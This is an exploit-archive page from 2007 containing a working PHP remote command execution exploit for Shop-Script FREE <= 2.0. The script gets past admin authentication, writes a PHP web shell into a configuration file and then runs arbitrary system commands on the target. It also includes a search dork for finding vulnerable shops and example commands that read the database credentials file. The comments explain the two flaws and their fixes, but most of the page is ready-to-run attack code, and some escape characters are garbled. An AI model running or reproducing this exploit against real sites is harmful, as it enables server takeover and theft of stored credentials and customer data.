Shop-Script FREE <= 2.0 Remote Command Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shop-Script FREE <= 2.0 Remote Command Execution Exploit
# Published : 2007-09-17
# Author : InATeam
# Previous Title : phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit
# Next Title : Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection
<?php
## Shop-Script FREE <= 2.0 Remote Command Execution Exploit by InATeam
## tested on versions 1.2 and 2.0
## works regardless magic_quotes_gpc=on
## Greetz: eXp, Kuzya, cxim, Russian, ENFIX

echo "--------------------------------------------------------n";
echo "Shop-Script FREE <= 2.0 Remote Command Execution Exploitn";
echo "(c)oded by Raz0r, InATeam (InAttack.Ru)n";
echo "dork: "Powered by Shop-Script FREE"n";
echo "--------------------------------------------------------n";

if ($argc<2) {
echo "USAGE:n";
echo "~~~~~~n";
echo "php {$argv[0]} [url] [cmd]nn";
echo "[url] - target server where Shop-Script FREE is installedn";
echo "[cmd] - command to executenn";
echo "e.g. php {$argv[0]} http://site.com/shop/ "ls -la"n";
echo "     php {$argv[0]} http://shop.site.com:8080/ "cat 
cfg/connect.inc.php"n";
die;
}
/**
 * software site: http://shop-script.com/
 *
 * i) admin authorization bypass
 * vulnerable code in admin.php near lines 37-41:
 * ------------------[source code]----------------------
 * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized
 *   {
 *       //show authorization form
 *       header("Location: access_admin.php");
 *   }
 * ------------------[/source code]---------------------
 * unathorized user wiil be redirected to the page with the auth form but the script will continue running.
 * So, admin panel can be accessed by ignoring "Location" header. Solution:
 * ------------------[source code]----------------------
 * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized
 *   {
 *       //show authorization form
 *       header("Location: access_admin.php");
 *       die;
 *   }
 * ------------------[/source code]---------------------
 * ii) arbitrary php code injection
 * vulnerable code in /includes/admin/sub/conf_appearence.php near lines 29-38:
 * ------------------[source code]----------------------
 * $f = fopen("./cfg/appearence.inc.php","w");
 * fputs($f,"<?phpntdefine('CONF_PRODUCTS_PER_PAGE', '".str_replace("'","'",stripslashes($_POST["productscount"]))."');n");
 * fputs($f,"tdefine('CONF_COLUMNS_PER_PAGE', '".str_replace("\"",""",$_POST["colscount"])."');n");
 * ...
 * fputs($f,"tdefine('CONF_LIGHT_COLOR', '".str_replace("\"",""",$_POST["lightcolor"])."');n?>");
 * fclose($f);
 * ------------------[/source code]---------------------
 * specially formed POST data will break the config file's structure. So, it is possible to inject
 * arbitrary php code in /cfg/appearence.inc.php. Solution: filtering backslash and single quote characters.
 */
error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$url = $argv[1];
$cmd = $argv[2];
$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
$packet ="GET {$path}admin.php?dpt=conf&sub=appearence HTTP/1.0rn";
$packet.="Host: {$host}rn";
$packet.="User-Agent: InAttack evil agentrn";
$packet.="Connection: closernrn";
$resp = send($packet);
echo "[~] Connecting to $host...";
$resp ? print(" OKn") : die(" failed");
$inputnames=array("productscount","colscount","darkcolor","middlecolor","lightcolor","add2cart","bestchoice");
$matches=array();
foreach($inputnames as $input) {
    if (preg_match('@<input type=text name='.$input.' value="([^"]*)">@',$resp,$matches)) $inputvalues[$input] = urlencode($matches[1]);
    elseif (preg_match('@<input type=checkbox name='.$input.' checked>@',$resp,$matches)) $inputvalues[$input] = "on";
}
if (!isset($inputvalues) || sizeof($inputvalues)==0) die("[-] Exploit failed");
echo "[~] Sending shellcode...";
$data = makedata(1);
$packet = "POST {$path}admin.php HTTP/1.0rn";
$packet.= "Host: $hostrn";
$packet.= "User-Agent: InAttack evil agentrn";
$packet.= "Content-Length: ".strlen($data)."rn";
$packet.= "Content-Type: application/x-www-form-urlencodedrn";
$packet.= "Connection: keep-alivernrn";
$packet.= $data;
$resp = send($packet);
$resp ? print(" OKn") : die(" failed");
echo "[~] Executing command...";
$packet ="GET {$path}index.php?cmd=".urlencode($cmd)." HTTP/1.0rn";
$packet.="Host: {$host}rn";
$packet.="User-Agent: InAttack evil agentrn";
$packet.="Connection: closernrn";
$resp = send($packet);
$matches=array();
if (!preg_match('@InAttack(.*?)InAttack@s',$resp,$matches))echo("failedn");
else (($result = $matches[1]) == 's4f3_m0d3') ? print(" failedn[-] 
Safe_mode=Onn") : (($result == 'd1s4bl3d') ? print(" failedn[-] 
system() is disabledn") : printf(" OKn%'-56sn%s%'-56sn",'',$result,''));
echo "[~] Restoring values...";
$data = makedata();
$packet = "POST {$path}admin.php HTTP/1.0rn";
$packet.= "Host: $hostrn";
$packet.= "User-Agent: InAttack evil agentrn";
$packet.= "Content-Length: ".strlen($data)."rn";
$packet.= "Content-Type: application/x-www-form-urlencodedrn";
$packet.= "Connection: keep-alivernrn";
$packet.= $data;
$resp = send($packet);
$resp ? print(" OKn") : die(" failed");

function send($packet) {
    global $host,$port;
    $ock = @fsockopen(@gethostbyname($host),$port);
    if (!$ock) return false;
    else {
        fputs($ock, $packet);
        $html='';
        while (!feof($ock)) $html.=fgets($ock);
    }
    return $html;
}

function makedata($modifyvalues=0) {
    global $inputvalues;
    $shellcode = '');if(!empty($_GET["cmd"])&&!defined("INA")){echo"InAttack";if(!ini_get("safe_mode")){if(strpos(ini_get("disable_functions"),"system")===false){$c=$_GET["cmd"];if(get_magic_quotes_gpc()){$c=stripslashes($c);}system($c);}else{echo"d1s4bl3d";}}else{echo"s4f3_m0d3";}echo"InAttack";define("INA",true);}//';
    $data = "dpt=conf&";
    $data.= "sub=appearence&";
    $data.= "save_appearence=1&";
    $data.= "productscount={$inputvalues['productscount']}";
    if ($modifyvalues==1) $data.=urlencode("\".$shellcode)."&"; else $data.="&";
    $data.= "colscount={$inputvalues['colscount']}";
    if ($modifyvalues==1) $data.=urlencode($shellcode)."&"; else $data.="&";
    $data.= "darkcolor={$inputvalues['darkcolor']}";
    if ($modifyvalues==1) $data.=urlencode("\\".$shellcode)."&"; else $data.="&";
    $data.= "middlecolor={$inputvalues['middlecolor']}&";
    $data.= "lightcolor={$inputvalues['lightcolor']}&";
    $data.= "add2cart={$inputvalues['add2cart']}&";
    $data.= "bestchoice={$inputvalues['bestchoice']}";
    return $data;
}
## EOF
?>

# www.Syue.com [2007-09-17]